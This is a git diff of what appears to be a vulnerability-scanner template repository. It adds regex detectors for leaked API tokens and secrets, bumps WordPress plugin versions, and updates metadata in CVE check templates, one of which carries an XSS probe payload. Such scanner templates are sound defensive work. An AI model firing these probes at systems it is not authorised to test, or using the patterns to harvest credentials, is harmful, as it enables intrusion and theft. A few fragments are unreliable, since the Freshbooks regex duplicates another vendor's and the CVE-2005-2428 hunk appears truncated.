file diff --git a/file/keys/finicity/finicity-client-secret.yaml b/file/keys/finicity/finicity-client-secret.yaml new file mode 100644 index 0000000000..8a88cebb18 --- /dev/null +++ b/file/keys/finicity/finicity-client-secret.yaml @@ -0,0 +1,22 @@ +id: finicity-client-secret + +info: + name: Finicity Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go + metadata: + verified: true + tags: finicity,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/finnhub-access-token.yaml b/file/keys/finnhub-access-token.yaml new file mode 100644 index 0000000000..2b830ded34 --- /dev/null +++ b/file/keys/finnhub-access-token.yaml @@ -0,0 +1,22 @@ +id: finnhub-access-token + +info: + name: Finnhub Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go + metadata: + verified: true + tags: finnhub,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/flickr-access-token.yaml b/file/keys/flickr-access-token.yaml new file mode 100644 index 0000000000..65c5988c6b --- /dev/null +++ b/file/keys/flickr-access-token.yaml @@ -0,0 +1,22 @@ +id: flickr-access-token + +info: + name: Flickr Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go + metadata: + verified: true + tags: flickr,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/flutter/flutterwave-encryption-key.yaml b/file/keys/flutter/flutterwave-encryption-key.yaml new file mode 100644 index 0000000000..10d2054403 --- /dev/null +++ b/file/keys/flutter/flutterwave-encryption-key.yaml @@ -0,0 +1,22 @@ +id: flutterwave-encryption-key + +info: + name: Flutterwave Encryption Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go + metadata: + verified: true + tags: flutter,file,keys,flutterwave + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - FLWSECK_TEST-(?i)[a-h0-9]{12} \ No newline at end of file diff --git a/file/keys/flutter/flutterwave-public-key.yaml b/file/keys/flutter/flutterwave-public-key.yaml new file mode 100644 index 0000000000..32c4fcea3f --- /dev/null +++ b/file/keys/flutter/flutterwave-public-key.yaml @@ -0,0 +1,22 @@ +id: flutterwave-public-key + +info: + name: Flutterwave Public Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml + metadata: + verified: true + tags: flutter,file,keys,flutterwave + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X \ No newline at end of file diff --git a/file/keys/flutter/flutterwave-secret-key.yaml b/file/keys/flutter/flutterwave-secret-key.yaml new file mode 100644 index 0000000000..cb8f91ca1a --- /dev/null +++ b/file/keys/flutter/flutterwave-secret-key.yaml @@ -0,0 +1,22 @@ +id: flutterwave-secret-key + +info: + name: Flutterwave Secret Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go + metadata: + verified: true + tags: flutter,file,keys,flutterwave + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - FLWSECK_TEST-(?i)[a-h0-9]{32}-X \ No newline at end of file diff --git a/file/keys/frameio-api-token.yaml b/file/keys/frameio-api-token.yaml new file mode 100644 index 0000000000..352f232f82 --- /dev/null +++ b/file/keys/frameio-api-token.yaml @@ -0,0 +1,22 @@ +id: frameio-api-token + +info: + name: Frameio API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go + metadata: + verified: true + tags: frameio,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - fio-u-(?i)[a-z0-9\-_=]{64} \ No newline at end of file diff --git a/file/keys/freshbooks-access-token.yaml b/file/keys/freshbooks-access-token.yaml new file mode 100644 index 0000000000..14653518fe --- /dev/null +++ b/file/keys/freshbooks-access-token.yaml @@ -0,0 +1,22 @@ +id: freshbooks-access-token + +info: + name: Freshbooks Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go + metadata: + verified: true + tags: freshbooks,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - fio-u-(?i)[a-z0-9\-_=]{64} \ No newline at end of file diff --git a/file/keys/gitter-access-token.yaml b/file/keys/gitter-access-token.yaml new file mode 100644 index 0000000000..dd4c03ce53 --- /dev/null +++ b/file/keys/gitter-access-token.yaml @@ -0,0 +1,22 @@ +id: gitter-access-token + +info: + name: Gitter Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go + metadata: + verified: true + tags: gitter,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/gocardless-api-token.yaml b/file/keys/gocardless-api-token.yaml new file mode 100644 index 0000000000..ab55b0aacb --- /dev/null +++ b/file/keys/gocardless-api-token.yaml @@ -0,0 +1,22 @@ +id: gocardless-api-token + +info: + name: Gocardless API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go + metadata: + verified: true + tags: gocardless,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/grafana/grafana-api-key.yaml b/file/keys/grafana/grafana-api-key.yaml new file mode 100644 index 0000000000..af821a6060 --- /dev/null +++ b/file/keys/grafana/grafana-api-key.yaml @@ -0,0 +1,22 @@ +id: grafana-api-key + +info: + name: Grafana API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go + metadata: + verified: true + tags: grafana,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/grafana/grafana-cloud-api-token.yaml b/file/keys/grafana/grafana-cloud-api-token.yaml new file mode 100644 index 0000000000..20ec44482c --- /dev/null +++ b/file/keys/grafana/grafana-cloud-api-token.yaml @@ -0,0 +1,22 @@ +id: grafana-cloud-api-token + +info: + name: Grafana Cloud API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go + metadata: + verified: true + tags: grafana,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/grafana/grafana-service-account-token.yaml b/file/keys/grafana/grafana-service-account-token.yaml new file mode 100644 index 0000000000..fc5748771e --- /dev/null +++ b/file/keys/grafana/grafana-service-account-token.yaml @@ -0,0 +1,22 @@ +id: grafana-service-account-token + +info: + name: Grafana Service Account Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go + metadata: + verified: true + tags: grafana,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/hashicorp-api-token.yaml b/file/keys/hashicorp-api-token.yaml new file mode 100644 index 0000000000..ca0b289484 --- /dev/null +++ b/file/keys/hashicorp-api-token.yaml @@ -0,0 +1,22 @@ +id: hashicorp-api-token + +info: + name: Hashicorp API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go + metadata: + verified: true + tags: hashicorp,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} \ No newline at end of file diff --git a/file/keys/zendesk-secret-key.yaml b/file/keys/zendesk-secret-key.yaml new file mode 100644 index 0000000000..79c1fa37ee --- /dev/null +++ b/file/keys/zendesk-secret-key.yaml @@ -0,0 +1,22 @@ +id: zendesk-secret-key + +info: + name: Zendesk Secret Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go + metadata: + verified: true + tags: zendesk,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt index 8012ebbba2..89f71c74ce 100644 --- a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt +++ b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt @@ -1 +1 @@ -4.2 \ No newline at end of file +4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-cfdb7.txt b/helpers/wordpress/plugins/contact-form-cfdb7.txt index 246d157007..a1a862fee8 100644 --- a/helpers/wordpress/plugins/contact-form-cfdb7.txt +++ b/helpers/wordpress/plugins/contact-form-cfdb7.txt @@ -1 +1 @@ -1.2.6.5 \ No newline at end of file +1.2.6.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index 182ea559ba..f05e61d963 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.8.2 \ No newline at end of file +5.8.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index 250205ed1c..e60643c3b1 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.104.0 \ No newline at end of file +1.105.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index 4cc0e35cb3..566ac6388b 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.6.0 \ No newline at end of file +5.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt index 476ede462b..02af9df7c9 100644 --- a/helpers/wordpress/plugins/insert-headers-and-footers.txt +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -1 +1 @@ -2.0.13 \ No newline at end of file +2.0.13.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index cb1ad9b47f..afa2b3515e 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.7.9 \ No newline at end of file +1.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index 23900d674d..4b1e48ed97 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.7.3 \ No newline at end of file +5.7.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index 756252de31..fab0a4f300 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.119 \ No newline at end of file +1.0.119.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index daf515c92d..d4f820371f 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.50.1 \ No newline at end of file +1.52.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 50aea0e7ab..e3a4f19336 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.1.0 \ No newline at end of file +2.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index cc6612c36e..a6254504e4 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.3.0 \ No newline at end of file +2.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index a33192706f..84c5308f03 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.8.2 \ No newline at end of file +7.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt index 202d1aaff4..5a4adf1c89 100644 --- a/helpers/wordpress/plugins/wordfence.txt +++ b/helpers/wordpress/plugins/wordfence.txt @@ -1 +1 @@ -7.10.1 \ No newline at end of file +7.10.2 \ No newline at end of file diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 362743df8f..0f50435ab9 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -3,20 +3,25 @@ id: CVE-2000-0114 info: name: Microsoft FrontPage Extensions Check (shtml.dll) author: r3naissance - severity: low + severity: medium description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://www.exploit-db.com/exploits/19897 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114 + remediation: Upgrade to the latest version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other - cvss-score: 5.0 - remediation: Upgrade to the latest version. - tags: cve,cve2000,frontpage,microsoft,edb + epss-score: 0.09258 + cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: internet_information_server + tags: cve,cve2000,frontpage,microsoft,edb http: - method: GET @@ -25,11 +30,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "_vti_bin/shtml.dll" + + - type: status + status: + - 200 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 37b2b32615..c0c83df526 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -3,22 +3,27 @@ id: CVE-2001-0537 info: name: Cisco IOS HTTP Configuration - Authentication Bypass author: DhiyaneshDK - severity: medium + severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. reference: - - https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936 - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/ - https://nvd.nist.gov/vuln/detail/CVE-2001-0537 + - http://www.ciac.org/ciac/bulletins/l-106.shtml + - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C + cvss-score: 9.3 cve-id: CVE-2001-0537 cwe-id: CWE-287 - cvss-score: 5.0 + epss-score: 0.89071 + cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: product:"Cisco IOS http config" && 200 + vendor: cisco + product: ios tags: cve,cve2001,cisco,ios,auth-bypass http: diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 5db70c3d4d..8243b9f833 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -3,24 +3,26 @@ id: CVE-2002-1131 info: name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting author: dhiyaneshDk - severity: medium + severity: high description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. reference: - http://www.redhat.com/support/errata/RHSA-2002-204.html - http://www.debian.org/security/2002/dsa-191 - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774 - https://www.exploit-db.com/exploits/21811 - - https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html - - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/ - https://nvd.nist.gov/vuln/detail/CVE-2002-1131 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2002-1131 - tags: cve2002,edb,xss,squirrelmail,cve + cwe-id: CWE-80 + epss-score: 0.06018 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 + vendor: squirrelmail + product: squirrelmail + tags: cve2002,edb,xss,squirrelmail,cve http: - method: GET @@ -32,12 +34,9 @@ http: - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -47,3 +46,7 @@ http: part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 76318a710c..1de7475149 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -8,16 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/24068 - http://security.gentoo.org/glsa/glsa-200405-16.xml - - http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857 + - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc + - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858 + - http://marc.info/?l=bugtraq&m=108334862800260 remediation: Upgrade to the latest version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other - tags: squirrelmail,cve2004,cve,edb,xss + epss-score: 0.02285 + cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sgi + product: propack + tags: squirrelmail,cve2004,cve,edb,xss http: - method: GET @@ -26,10 +32,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -39,3 +41,7 @@ http: part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 31000bcb59..8236b3fc1f 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -9,14 +9,19 @@ info: reference: - https://www.exploit-db.com/exploits/24055 - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 + - http://marc.info/?l=bugtraq&m=108301983206107&w=2 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other + epss-score: 0.0113 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: openbb + product: openbb tags: cve,cve2004,redirect,xss,openbb http: diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index ab021aa862..d3011ef96d 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -9,27 +9,35 @@ info: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 - https://nvd.nist.gov/vuln/detail/CVE-2005-2428 + - http://marc.info/?l=bugtraq&m=112240869130356&w=2 + - http://securitytracker.com/id?1014584 remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2005-2428 cwe-id: CWE-200 - tags: domino,edb,cve,cve2005 + epss-score: 0.01188 + cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ibm + product: lotus_domino + tags: domino,edb,cve,cve2005 http: - method: GET path: - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and matchers: + - type: regex + name: domino-username + part: body + regex: + - '(Horde :: User Administration" diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 5a95371b7c..3be084b3d8 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -14,14 +14,17 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/23031 - https://nvd.nist.gov/vuln/detail/CVE-2005-3634 classification: - cvss-metrics: CVSS:2.0/(AV:N/AC:L/Au:N/C:N/I:P/A:N) - cvss-score: 5.0 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5 cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other - cpe: cpe:2.3:a:sap:sap_web_application_server:7.0:*:*:*:*:*:*:* + epss-score: 0.02843 + cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"SAP Business Server Pages Team" + vendor: sap + product: sap_web_application_server tags: cve,cve2005,sap,redirect,business http: diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 3ab648d6c7..53ef9e9d0e 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -7,16 +7,20 @@ info: description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. reference: - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html - - http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/ - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 + - http://www.vupen.com/english/advisories/2005/2977 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other - tags: cofax,xss,cve,cve2005 + epss-score: 0.00294 + cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cofax + product: cofax + tags: cofax,xss,cve,cve2005 http: - method: GET @@ -25,10 +29,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - "'>\"" + + - type: status + status: + - 200 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index a6782a8f05..0cb4e34c71 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -6,18 +6,22 @@ info: severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. reference: - - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/ - - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/ - http://www.vupen.com/english/advisories/2006/1292 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/25698 + - https://security.gentoo.org/glsa/202012-09 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other - tags: cherokee,httpd,xss,cve,cve2006 + epss-score: 0.01015 + cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cherokee + product: cherokee_httpd + tags: cherokee,httpd,xss,cve,cve2006 http: - method: GET @@ -26,9 +30,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "" @@ -37,3 +38,7 @@ http: part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 12eac06b68..df57a144c1 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -9,16 +9,20 @@ info: - https://www.exploit-db.com/exploits/27948 - 